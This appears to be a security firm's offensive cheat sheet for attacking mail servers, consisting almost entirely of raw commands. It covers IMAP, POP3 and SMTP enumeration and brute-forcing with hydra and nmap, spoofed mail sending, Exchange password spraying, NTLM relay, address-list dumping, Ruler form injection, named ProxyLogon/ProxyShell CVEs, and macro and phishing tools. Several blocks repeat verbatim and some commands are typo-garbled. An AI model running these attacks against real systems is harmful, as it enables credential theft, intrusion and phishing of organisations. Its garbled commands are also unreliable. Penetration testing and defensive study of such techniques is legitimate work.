A cheat sheet of common enumeration and attack methods for mail servers.
Brought to you by:
HADESS performs offensive cybersecurity services through infrastructures and software that include vulnerability analysis, scenario attack planning, and implementation of custom integrated preventive projects. We organized our activities around the prevention of corporate, industrial, and laboratory cyber threats.
nmap [-sS] [-sC] -Pn -p 143,993 -sV --script=banner [IP]
nc -nv [IP] 993
shodan search "port:143"
telnet example.com 143
a1 AUTHENTICATE NTLM
nmap --script=imap-ntlm-info [IP]
hydra -l USERNAME -P passwords.txt -f [IP] imap -V
hydra -S -v -l USERNAME -P passwords.txt -s 993 -f [IP] imap -V
nmap -sV --script imap-brute -p [PORT] [IP]
nmap [-sS] [-sC] -Pn -p 110,995 -sV --script=banner [IP]
nc -nv [IP] 110
shodan search "port:995"
nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -p [PORT] [IP]
a1 AUTHENTICATE NTLM
nmap -p110 --script pop3-brute <target>
hydra -l muts -P pass.txt [IP] pop3
nmap [-sS] [-sC] -Pn -p 25,465,587 -sV --script=banner or --script smtp-commands [IP]
nc -nv [IP] 25
nc -nv [IP] 465
nc -nv [IP] 587
shodan search "port:25"
shodan search "port:465"
shodan search "port:587"
telnet example.com 587
HELO
AUTH NTLM 334
a1 AUTHENTICATE NTLM
nmap -p[25,465,587] --script smtp-brute <target>
hydra -l muts -P pass.txt [IP] smtp
emkei.cz
telnet [IP] [25 or 465 or 587]
MAIL FROM: [sender address]
RCPT TO: [recipient address]
SUBJECT: Test message
.
shodan search "8.8.6_GA_1906"
shodan search "zimbra"
modules/auxiliary/gather/memcached_extractor
evilmacro
macropack
...
LDAPPER. py -D EVIL -U 'Administrator' -P ‘password’ -S DC02.EVIL.DEV
' (msExchDeviceID=123456)
peas - u ' EVIL.DEV\sh' -p '[password]' mail.evil.dev --list-unc'\\DC01\'
gophish
CVE-2022-37042
CVE-2022-37041
CVE-2022-37044
POST
shodan search "http.title:'Roundcube Webmail :: Welcome to Roundcube Webmail'"
shodan search "http.favicon.hash:976235259"
evilmacro
macropack
...
LDAPPER. py -D EVIL -U 'Administrator' -P ‘password’ -S DC02.EVIL.DEV
' (msExchDeviceID=123456)
peas - u ' EVIL.DEV\sh' -p '[password]' mail.evil.dev --list-unc'\\DC01\'
gophish
CVE-2021-44026
POST
shodan search "'X-AspNet-Version http.title:'Outlook' –'x-owa-version'"
shodan search "http.favicon.hash:44274939"
shodan search "http.title:outlook exchange"
autodiscover/autodiscover.xml
ProxyLogon (CVE-2021-26855)
ProxyShell (CVE-2021-34473)
HAFNIUM campaign (CVE-2021-26858)
Invoke-PasswordSprayOWA
Invoke-PasswordSprayEWS
nmap --script http-ntlm-info
Responder
./exchangeRelayx.py -t https://mail.evil.com
Get-GlobalAddressList -ExchHostname mail.domain.com -UserName
domain\username -Password password -OutFile global-address-list.txt
Bloodhound
net
GUI
Ruler
./ruler --email [email protected] form add --suffix superduper --input command.txt --send
evilmacro
macropack
...
LDAPPER. py -D EVIL -U 'Administrator' -P ‘password’ -S DC02.EVIL.DEV
' (msExchDeviceID=123456)
peas - u ' EVIL.DEV\sh' -p '[password]' mail.evil.dev --list-unc'\\DC01\'
peas -U ' EVIL.DEC\user’ -p ‘password’ exch01.evil.dev - -smb-user=‘EVIL\sharepoint-setup'
• - smb-pass=' password’ •-list-unc 'http://SHP01/share’
nmap mail.evil.dev -p 6001 -sV -sC
rpcmap . py -debug -auth-transport’EVIL/user:password’
'ncacn http: /6001,RpcProxy=mail.evil.dev: 443]'
rpcmap.py -debug -auth-transport 'EVIL/user:password' -auth-rpc 'EVIL/mia:password' -auth-level 6 -brute-opnums 'ncacn_http:[6001,RpcProxy=mail.evil.dev:443]'
LDAPPER. py -D EVIL - U 'Administrator' -P ‘password’ -S DC01. EVIL.DEV
([email protected]) mail objectGUID legacyExchangeDN distinguishedName
exchanger. py EVIL/user: ‘password’@mail.evil.dev nspi
dump -tables -name Hackers -lookup-tvpe EXTENDED
gophish